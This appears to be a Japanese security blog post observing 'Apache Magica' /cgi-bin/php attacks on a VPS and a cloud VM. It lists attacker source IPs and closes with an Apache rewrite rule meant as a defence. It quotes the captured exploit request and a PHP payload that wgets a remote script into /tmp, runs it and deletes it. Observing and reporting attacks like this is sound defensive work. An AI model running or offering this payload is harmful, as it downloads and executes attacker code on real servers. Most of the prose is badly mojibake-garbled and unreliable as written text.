ãããã£ã¯ã©ã¦ãã«æ¥ãæªã人ã観å¯ãããã®åã£ããã
ä»ã¾ã§ãã®blogã§ã¯ããããã®VPSã«æ¥ãæªã人ã観å¯ãã¦ãã¾ããã
ããä»åããããã£ã¯ã©ã¦ãã®VMãµã¼ããæé ãããã¨ãã§ãã¾ãããã¨ãããã¨ã§2ã¤ã®ãã¹ãã£ã³ã°ãµã¼ããã¾ããã£ã¦è¦³å¯ãããã¨ã§ãã¢ã¿ãã¯ã«ä½ãéããè¦ãããããªãããããããã¨ããã®ãã¡ãã£ã¨è¦³å¯ãã¦ããã¾ãã
ã¨ããããæå§ãã«ãæè¿çå¨ããµãã£ã¦ãããã®ã«æ»æãã¡ãã£ã¨è¦ã¦ã¿ã¾ãã(/cgi-bin/phpへの魔法少女アパッチ☆マギカ攻撃への注意喚起)
対象ãµã¼ã
- ãããã®VPS (49.212.197.88)
- ãããã£ã¯ã©ã¦ã (175.184.19.124)
ã®2ã¤ã§ãã
ãããã£ã¯ã©ã¦ãã¯æ¨æ¥èµ·åãã¦ãã¨ããããApacheã®mod_rewriteã使ã£ã¦/cgi-bin/phpã«ã¢ã¯ã»ã¹ãæ¥ãã500ãè¿ãããã«ãã¦ããã¾ãããããã§CGIçPHPãã¤ã³ã¹ãã¼ã«ããã¦ããã¨æãè¾¼ãã æªã人ã®ã¢ã¿ãã¯ãæ¥ãã¯ãã§ãã®ã§ãtcpdumpãã¦å¾ ã¡ã¾ãã
<LocationMatch "^/cgi-bin/php"> RewriteEngine on RewriteRule '' '' [R=500,L] </LocationMatch>
ã§ãæ¨æ¥èµ·åããã°ããã§ããããã/cgi-bin/phpã®Apache Magicaæ»æããããããã£ã¦ãã¦ãã¾ããã²ã©ãã§ããã
/cgi-bin/php æ»æã¯ãããã®VPSã¨ãããã£ã¯ã©ã¦ãã§éãã¯è¦ãããã
çµè«ããè¨ãã¨ãã¡ãã£ã¨ããå°ãã¿ã§å·®ã¯ããã¾ããã大ããªéãã¯è¦ããã¾ããããããã«æ»æè ã«ãæ¥ç¶å ã«ãã£ã¦è²ã 使ãåããã»ã©ã®ç´°ããä½è£ã¯ç¡ãã®ã§ããããã¨ãããå¾®å¦ãªæéå·®ãè¦ãã¨ãã¤ã³ã¿ã¼ãããä¸ã®å ¨ã¦ã®IPã¢ãã¬ã¹ããã«ã¹ãã£ã³ãã¦ããã®ã§ã¯ãªãã ãããâ¦â¦ã
ä»æ¥ããã£ã±ãæ¥ã¦ããã以ä¸ã®ã¢ã¿ãã¯ãPOSTãªã¯ã¨ã¹ãããã£ã¾ã§åãã ãã¦æ¯è¼ãã¾ããã
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6Cï¼çç¥ï¼
ãããã£ã¯ã©ã¦ãã¸ã®ã¢ã¿ãã¯
2013/12/25ã®ä¸è¨ã¢ã¿ãã¯ã®ã½ã¼ã¹IPã¢ãã¬ã¹ã¯ä»¥ä¸ã§ããã
IPã¢ãã¬ã¹ | å½å | AS |
---|---|---|
124.193.182.61 | CN | AS17816 China Unicom IP network China169 Guangdong province |
193.49.249.160 | FR | AS2200 Reseau National de telecommunications pour la Technologie |
46.37.23.91 | IT | AS31034 Aruba S.p.A. |
190.101.37.176 | CL | AS22047 BANDA ANCHA S.A. |
ãããã®VPSã¸ã®ã¢ã¿ãã¯
2013/12/24ã®ä¸è¨ã¢ã¿ãã¯ã®ã½ã¼ã¹IPã¢ãã¬ã¹ã¯ä»¥ä¸ã§ããããªã1æ¥ãããããã¨è¨ãã¨ã12/25ã«ã¯å ¨ãä¸è¨ã®ã¢ã¯ã»ã¹ãæ¥ãªãã£ãããã§ããä½æ ã§ããããè¬ã§ããç§ãæªããã¨ãã¦ãã人観å¯ãã¦ããã®ããã¬ãã®ã§ããããã
IPã¢ãã¬ã¹ | å½å | AS |
---|---|---|
91.121.90.166 | FR | AS16276 OVH Systems |
188.40.74.133 | DE | AS24940 Hetzner Online AG |
192.151.144.234 | US | AS33387 DataShack, LC |
50.18.192.203 | US | AS16509 Amazon.com, Inc. |
41.162.51.242 | ZA | AS36937 Neotel Pty Ltd |
ä¸è´ããã®ã¯ä½ã
ä¸è¨ã®ããããã£ã¯ã©ã¦ãã¸ã®ã¢ã¿ãã¯ãã¨ããããã®VPSã¸ã®ã¢ã¿ãã¯ãããããã¯POSTãªã¯ã¨ã¹ããªã®ã§ããªã¯ã¨ã¹ãBODYãå®è¡ãããã¨ãã¦ããPHPã¹ã¯ãªããã§ããããéè¦ã§ããtcpdumpãã¦ããã®ã§ããããè¦ã¦ã¿ãã®ã§ããâ¦â¦ã¬ããã¨ãä¸è¨ãããã£ã¯ã©ã¦ãã®4ã¤ã¨ããããã®VPSã¸ã®5ã¤ã¯ããã¹ã¦åãPOSTããã£ã§ããã
ããã以ä¸ã®ã¹ã¯ãªããã«ãªãã¾ããè¦ãããããããæ¹è¡ãå ¥ãã¾ããã
<?php system(" wget http://221.132.XX.XX/scen -O /tmp/sh; sh /tmp/sh; rm -rf /tmp/sh ");
ã¡ãªã¿ã«221.132.XX.XXã¯ããããã ã®Vietnam Posts and Telecommunicationsã¨ããã¨ããã§ããæ¢ã«å¯¾å¦ãããããã§ãç¾å¨ã¯ãã¦ã³ãã¼ããããã¨ãã㨠404 Not Foundã§ãã
ãªãã¨ãªãåãããã¨
ã¾ããå®éã«ãã¦ã³ãã¼ãããããã¨ãã¦ããæ»æã¹ã¯ãªãããåä¸ã§ãããã¨ããããã®æ»æã¯å ¨ã¦åä¸ã®æ»æè (æ»æçµç¹)ã«ãããã®ã¨æããã¾ãã
æ»æè ã¯ã½ã¼ã¹IPã¢ãã¬ã¹ãã©ã使ãåãã¦ããã
ããã«ãã¦ãæ»æå ã®ã½ã¼ã¹IPã¢ãã¬ã¹ã¯ã³ãã³ãã¨å¤ããã¾ãããããããããã£ã¯ã©ã¦ãã«æ¥ãã½ã¼ã¹IPã¢ãã¬ã¹ã¨ããããã®VPSã«æ¥ãã½ã¼ã¹IPã¢ãã¬ã¹ã§ã¯ãéåã¨é°å²æ°ãéãã¾ããç¹ã«ãããã®VPSã«æ¥ã¦ãããã©ã³ã¹ã®OVHãã¢ã¡ãªã«ã®DataShackã¯ããã°ã常é£ããªã®ã§ããããããã£ã¯ã©ã¦ãã®æ¹ã«æ¥ã¦ãã¾ããã
ä¸æ¹ããããã£ã¯ã©ã¦ãã®æ¹ã«æ¥ã¦ããã½ã¼ã¹IPã¢ãã¬ã¹ã®ASãè¦ãã¨ãããããä»ã¾ã§ãããã®VPSã®æ¹ã«æ¥ããã¨ã¯ã¾ã ç¡ã(ã¨æãã¾ã)ã
ä½ãè¨ããããã¨è¨ãã¨ãããããæ»æè ã«ã¯ãã¿ã¼ã²ããã®IPã¢ãã¬ã¹ã«ãã£ã¦å©ç¨ããã½ã¼ã¹IPã¢ãã¬ã¹ã決å®ãããä½ããã®ãã¸ãã¯ãããã®ã§ã¯ãªãã§ãããããããã«ã©ãããæå³ããããã¯ã¡ãã£ã¨ããåããã¾ããããï¼å¸¸ã«ã©ã³ãã ã«ããã°ããæ°ããããã©ï¼ã
çµããã«
ã¨ãããããè¶ ãããã ãåºãã¦ã¿ã¾ãããæ£æä¼ã¿æããããã«ä½ãåºããã°ããããªã¨æãã¾ãã